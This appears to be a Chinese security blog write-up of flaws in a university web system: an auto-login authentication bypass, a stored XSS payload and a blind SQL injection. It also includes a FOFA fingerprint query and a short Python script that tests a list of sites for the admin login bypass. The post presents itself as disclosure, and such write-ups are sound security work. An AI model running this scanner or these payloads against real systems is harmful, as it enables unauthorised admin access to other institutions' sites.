收藏一下~
可以收录到专辑噢~
记一次EDU网站漏洞通杀(原创)

一、漏洞挖掘
1、逻辑缺陷
熟悉的页面,熟悉的弱口令测试,但无果
我就把目光转向js审计,果不其然有新发现,可以根据账号自动登录
于是直接构造请求绕过登录
经典的管理员权限
2、存储型XSS
寻找文本输入
浅析: 前端:这里的标签都是普通标签,没有像RCDATA
元素(RCDATA elements
),有<textarea>
和<title>
,会做一次HTML编码,所以可以直接插入危险的js代码。 后端:没有任何过滤(xs~
所以就简单了,直接插入<script>alert('1')</script>
即可
3、SQL注入
测试无果
最后发现注入点在第一个函数,果然任何一个输入点都可能是不安全的,是布尔型盲注
后面就是经典Sqlmap了
二、继续通杀
根据系统指纹在fofa上搜索:"xx系统" && icon_hash="11xxxx"
有32个IP,看了下,有重复的
使用fofa_viewer导出目标 这里我根据第一个逻辑漏洞的漏洞指纹信息,写了一个简单poc
import requests
def poc(url):
poc_url = url + '/login/doautologin.edu'
data = {'um.userid': "admin"}
try:
res = requests.post(poc_url, data=data, timeout=5)
if (res.headers.get("Set-Cookie")): # 登录成功就会set-cookie
print(url + '/login.html')
except BaseException:
pass
if __name__ == '__main__':
with open('url.txt', 'r') as f:
for i in f:
poc(i.rstrip('\n'))
以上漏洞均已报告给相应学校且已修复
三、思考总结
1)在访问系统当中的时候F12查看源码是一个不错的习惯(尤其是有前端弹框的)
2)前端代码的一切展示行为完全可控(一定要理解这句话)
3)了解程序的底层逻辑,你才能更清晰的知道每一个参数的意义
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录